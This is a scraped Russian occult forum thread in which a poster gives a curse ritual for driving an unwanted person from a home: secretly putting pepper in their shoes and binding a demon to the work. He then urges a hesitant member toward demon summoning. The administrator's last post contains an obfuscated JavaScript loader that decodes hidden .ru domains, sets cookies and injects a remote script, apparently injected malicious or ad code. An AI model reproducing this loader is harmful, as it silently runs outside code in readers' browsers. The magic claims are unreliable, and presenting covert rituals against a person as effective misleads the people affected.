Практическая черная магия
Пожалуйста зайдите под своим именем или зарегистрируйтесь.
После регистрации Вы получите доступ в закрытые разделы сайта.

Внимание! Важная информация для РЕГИСТРАЦИИ на форуме.
Пожалуйста, не регистрируйтесь на этом форуме с электронными адресами mail.ru, bk.ru, inbox.ru, list.ru - вам может не прийти письмо со ссылкой активации!
Вы можете воспользоваться адресами типа yandex.ru, rambler.ru, gmail.com
Сопровадить не нужного человека с избы Opera_10
Практическая черная магия
Пожалуйста зайдите под своим именем или зарегистрируйтесь.
После регистрации Вы получите доступ в закрытые разделы сайта.

Внимание! Важная информация для РЕГИСТРАЦИИ на форуме.
Пожалуйста, не регистрируйтесь на этом форуме с электронными адресами mail.ru, bk.ru, inbox.ru, list.ru - вам может не прийти письмо со ссылкой активации!
Вы можете воспользоваться адресами типа yandex.ru, rambler.ru, gmail.com
Сопровадить не нужного человека с избы Opera_10
Практическая черная магия
Вы хотите отреагировать на этот пост ? Создайте аккаунт всего в несколько кликов или войдите на форум.

Практическая черная магия

Привороты Порчи Присушки Остуды Чистки Рассорки
 
ФорумФорум  ПорталПортал  КалендарьКалендарь  Последние изображенияПоследние изображения  ЧаВоЧаВо  ПоискПоиск  ПользователиПользователи  ГруппыГруппы  РегистрацияРегистрация  ВходВход  
⬤ БЛАЖЕН КТО ВЕРУЕТ, СИЛЁН КТО ВЕДАЕТ ⬤
Похожие темы
Последние темы
» Вернуть человека
Сопровадить не нужного человека с избы Empty24.03.24 12:54 автор Tina

» " Призыв Абары " Порча на смерть
Сопровадить не нужного человека с избы Empty15.03.24 6:00 автор Stalkercccp1

» Руны для получения денег
Сопровадить не нужного человека с избы Empty20.02.24 13:54 автор vhenejo

» Приворот на сахар и кровь
Сопровадить не нужного человека с избы Empty19.02.24 7:45 автор lana000

» Привлечь большие деньги
Сопровадить не нужного человека с избы Empty12.02.24 18:42 автор duhcca

» Обрести симпатию окружающих
Сопровадить не нужного человека с избы Empty18.11.23 3:00 автор Tina

» Присушка на кровь
Сопровадить не нужного человека с избы Empty18.11.23 2:55 автор Tina

» Заговор на важное желание
Сопровадить не нужного человека с избы Empty16.06.23 12:08 автор lana000

» Что бы быстро похудеть (СИЛЬНОЕ)
Сопровадить не нужного человека с избы Empty28.04.23 18:33 автор Зулейка

» Приворот на месячную кровь (без подливания)
Сопровадить не нужного человека с избы Empty23.04.23 20:34 автор Оксана0

» ТАЛИСМАН, ЧТОБЫ ДЕНЬГИ В КОШЕЛЬКЕ НЕ ЗАКАНЧИВАЛИСЬ
Сопровадить не нужного человека с избы Empty22.04.23 8:25 автор Светлана2

» Выигрыш в любой азартной игре
Сопровадить не нужного человека с избы Empty22.04.23 7:56 автор Светлана2

» Денежный маяк
Сопровадить не нужного человека с избы Empty21.04.23 18:56 автор Светлана2

» Обряд на денежный рост "Сорок Монет Даждю"
Сопровадить не нужного человека с избы Empty21.04.23 18:42 автор Светлана2

» Заговор на покорность
Сопровадить не нужного человека с избы Empty11.04.23 20:41 автор ОКСАНА31

» Снять рассорку
Сопровадить не нужного человека с избы Empty09.04.23 13:31 автор ОКСАНА31

» Порча на 9 узлов
Сопровадить не нужного человека с избы Empty06.04.23 19:40 автор ванюша

» Однополый приворот (женский)
Сопровадить не нужного человека с избы Empty03.04.23 16:55 автор gyulnara_92@mail.ru

» Кто нибудь знает точные определения этих терминов из магии?
Сопровадить не нужного человека с избы Empty03.04.23 1:26 автор once upon a time I was

» СЛОВАРЬ МАГИЧЕСКИХ ТЕРМИНОВ
Сопровадить не нужного человека с избы Empty01.04.23 9:54 автор once upon a time I was

» На мне порча. Подскажите как снять
Сопровадить не нужного человека с избы Empty30.03.23 8:15 автор once upon a time I was

» Помогите советом! Порча 100 %
Сопровадить не нужного человека с избы Empty28.03.23 6:52 автор Радужный Феникс

» Религии 20 Канала (Суд)
Сопровадить не нужного человека с избы Empty26.03.23 0:45 автор Valentina0

» Пророчества Серафима Саровского
Сопровадить не нужного человека с избы Empty26.03.23 0:16 автор Valentina0

» Серафима Черная
Сопровадить не нужного человека с избы Empty25.03.23 23:50 автор Valentina0

В Контакте
Сопровадить не нужного человека с избы 16833710
Facebook
Instagram
ЛУНА
++++++++++
E-mail: mag-nitas@ya.ru
Погода
Партнеры
Top.Mail.Ru Анализ сайта - PR-CY Rank

 

 Сопровадить не нужного человека с избы

Перейти вниз 
Участников: 4
АвторСообщение
СТАРОВЕР

СТАРОВЕР


Мужчина Сообщения : 14
Дата регистрации : 2014-08-14
Откуда : Сибирь
Работа/Хобби : Колдовство
Настроение : Отменное

Сопровадить не нужного человека с избы Empty
СообщениеТема: Сопровадить не нужного человека с избы   Сопровадить не нужного человека с избы Empty18.08.14 12:15

Частенько подсыпать по крохотной щепотке красного перца в обувь человека приговаривая "Перец жги, раба(имя) прочь от меня гони, дороги ногам его назад в мой дом найти не вели от порога моего прочь уводи! Да будет так! Да будет так! Да будет так!
 Дана вам дорогие друзья заготовка, в данном виде действует на личной силе. Нужно привязать к работе силу, беса. А именно открыв врата взяв беса с собою, а именно землю, по всем правилам.

_________________
Никогда не ошибается тот, кто ничего не делает.
Вернуться к началу Перейти вниз
Nebesskaya

Nebesskaya


Женщина Сообщения : 70
Дата рождения : 1993-11-25
Дата регистрации : 2013-01-20
Возраст : 30

Сопровадить не нужного человека с избы Empty
СообщениеТема: Re: Сопровадить не нужного человека с избы   Сопровадить не нужного человека с избы Empty18.08.14 12:18

человеку, ранее не имевшему опыта в похожих обрядах, лучше не делать? откуп может есть какой-то...

_________________
Ветер нам благоприятствует, а большего и не надо [Вы должны быть зарегистрированы и подключены, чтобы видеть это изображение]
Вернуться к началу Перейти вниз
СТАРОВЕР

СТАРОВЕР


Мужчина Сообщения : 14
Дата регистрации : 2014-08-14
Откуда : Сибирь
Работа/Хобби : Колдовство
Настроение : Отменное

Сопровадить не нужного человека с избы Empty
СообщениеТема: Re: Сопровадить не нужного человека с избы   Сопровадить не нужного человека с избы Empty18.08.14 12:26

Давайте я дам тему об эти откупах закупах и т.д, тут беря с собой беса вы его привлекаете либо на водку либо кровь, и домой. Откуп только за взятую землю, пятак. И все это бред вот новичкам ниче нельзя, я знаю что можно что нельзя, с самого начала сего пути можно, вам нужно раскачивать силу. Льете допустим водку на землю после призыва, беся слетаются на водку а вы цап царап эту землю и закрываете, зыкрываем варата и уходим домой, и делаем с бесом.

_________________
Никогда не ошибается тот, кто ничего не делает.
Вернуться к началу Перейти вниз
Nebesskaya

Nebesskaya


Женщина Сообщения : 70
Дата рождения : 1993-11-25
Дата регистрации : 2013-01-20
Возраст : 30

Сопровадить не нужного человека с избы Empty
СообщениеТема: Re: Сопровадить не нужного человека с избы   Сопровадить не нужного человека с избы Empty18.08.14 12:39

я не чувствую в себе силы на данный обряд, никогда такого не делала. поэтому спасибо за информацию, наверное не придётся воспользоваться столь ценными данными.

_________________
Ветер нам благоприятствует, а большего и не надо [Вы должны быть зарегистрированы и подключены, чтобы видеть это изображение]
Вернуться к началу Перейти вниз
СТАРОВЕР

СТАРОВЕР


Мужчина Сообщения : 14
Дата регистрации : 2014-08-14
Откуда : Сибирь
Работа/Хобби : Колдовство
Настроение : Отменное

Сопровадить не нужного человека с избы Empty
СообщениеТема: Re: Сопровадить не нужного человека с избы   Сопровадить не нужного человека с избы Empty18.08.14 12:43

Я могу сказать что вам промыли дух, человек триедин, тело, дух, душа, так дух промыли. Нужно делать все, нужно раскачивать силу иначе вам никакой силы и практики не светит. На перекрестке беса взять и подсыпать его врагу, тут ничего сложного, знать только с какого пальца кровь и все. Если надумаете я могу вас проконсультировать по обряду.

_________________
Никогда не ошибается тот, кто ничего не делает.
Вернуться к началу Перейти вниз
Nebesskaya

Nebesskaya


Женщина Сообщения : 70
Дата рождения : 1993-11-25
Дата регистрации : 2013-01-20
Возраст : 30

Сопровадить не нужного человека с избы Empty
СообщениеТема: Re: Сопровадить не нужного человека с избы   Сопровадить не нужного человека с избы Empty18.08.14 12:49

хорошо. обязательно обращусь, когда созрею внутренне. да и отката всегда как огня боялась)

_________________
Ветер нам благоприятствует, а большего и не надо [Вы должны быть зарегистрированы и подключены, чтобы видеть это изображение]
Вернуться к началу Перейти вниз
СТАРОВЕР

СТАРОВЕР


Мужчина Сообщения : 14
Дата регистрации : 2014-08-14
Откуда : Сибирь
Работа/Хобби : Колдовство
Настроение : Отменное

Сопровадить не нужного человека с избы Empty
СообщениеТема: Re: Сопровадить не нужного человека с избы   Сопровадить не нужного человека с избы Empty18.08.14 12:52

Откат только в случае защиты на жертве, берем падший знак Дьявола, и в угла остры заключаем бесяв, т.е 5 бесяв в защиту, про откаты далее стоит забыть.

_________________
Никогда не ошибается тот, кто ничего не делает.
Вернуться к началу Перейти вниз
Nebesskaya

Nebesskaya


Женщина Сообщения : 70
Дата рождения : 1993-11-25
Дата регистрации : 2013-01-20
Возраст : 30

Сопровадить не нужного человека с избы Empty
СообщениеТема: Re: Сопровадить не нужного человека с избы   Сопровадить не нужного человека с избы Empty18.08.14 12:59

какое я имею основание на управление бесами? никакого. на это имеют право только люди с осознанием сего.

_________________
Ветер нам благоприятствует, а большего и не надо [Вы должны быть зарегистрированы и подключены, чтобы видеть это изображение]
Вернуться к началу Перейти вниз
Nebesskaya

Nebesskaya


Женщина Сообщения : 70
Дата рождения : 1993-11-25
Дата регистрации : 2013-01-20
Возраст : 30

Сопровадить не нужного человека с избы Empty
СообщениеТема: Re: Сопровадить не нужного человека с избы   Сопровадить не нужного человека с избы Empty18.08.14 13:00

я ни в коем случае не спорю, просто это моё мнение и хотелось бы узнать больше информации на сей счёт

_________________
Ветер нам благоприятствует, а большего и не надо [Вы должны быть зарегистрированы и подключены, чтобы видеть это изображение]
Вернуться к началу Перейти вниз
СТАРОВЕР

СТАРОВЕР


Мужчина Сообщения : 14
Дата регистрации : 2014-08-14
Откуда : Сибирь
Работа/Хобби : Колдовство
Настроение : Отменное

Сопровадить не нужного человека с избы Empty
СообщениеТема: Re: Сопровадить не нужного человека с избы   Сопровадить не нужного человека с избы Empty18.08.14 13:02

Колдовство есть развитие, служба Дьяволу не есть рабство в отличае от отца, сына и святага духа, тут идет не подчинение силы, а идет служба, делаете службу дьяволу получаете результат/помощь/подсобничество.

_________________
Никогда не ошибается тот, кто ничего не делает.
Вернуться к началу Перейти вниз
Nebesskaya

Nebesskaya


Женщина Сообщения : 70
Дата рождения : 1993-11-25
Дата регистрации : 2013-01-20
Возраст : 30

Сопровадить не нужного человека с избы Empty
СообщениеТема: Re: Сопровадить не нужного человека с избы   Сопровадить не нужного человека с избы Empty18.08.14 13:38

да, именно так и представляю для себя ритуал. сделка. ты платишь, работа выполняется. но опыта мало, много трусости и неумения)

_________________
Ветер нам благоприятствует, а большего и не надо [Вы должны быть зарегистрированы и подключены, чтобы видеть это изображение]
Вернуться к началу Перейти вниз
Yakov666




Мужчина Сообщения : 2
Дата регистрации : 2015-09-02

Сопровадить не нужного человека с избы Empty
СообщениеТема: Re: Сопровадить не нужного человека с избы   Сопровадить не нужного человека с избы Empty02.09.15 14:30

Старовер здравствуйте. Если можно проконсультируйте меня я  начинаю свои первые шаги в магии и очень хочу стать черным магом чувствую что это моё. В личку пока писать не могу.
Вернуться к началу Перейти вниз
Наместник
АДМИНИСТРАТОР
АДМИНИСТРАТОР
Наместник


Сообщения : 382
Дата регистрации : 2012-05-03

Сопровадить не нужного человека с избы Empty
СообщениеТема: Re: Сопровадить не нужного человека с избы   Сопровадить не нужного человека с избы Empty02.09.15 15:28

Yakov666 пишет:
Старовер здравствуйте. Если можно проконсультируйте меня я  начинаю свои первые шаги в магии и очень хочу стать черным магом чувствую что это моё. В личку пока писать не могу.
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="18167",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("black-magic.mirbb.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();



Yakov666, еще один такой пост и я вас забаню!!!


Вернуться к началу Перейти вниз
 
Сопровадить не нужного человека с избы
Вернуться к началу 
Страница 1 из 1
 Похожие темы
-
» Семь Тел Человека. Чакры Человека. Аура (видео)
» Вернуть человека
» АУРА человека

Права доступа к этому форуму:Вы не можете отвечать на сообщения
Практическая черная магия :: ПРАКТИЧЕСКАЯ МАГИЯ-
Перейти: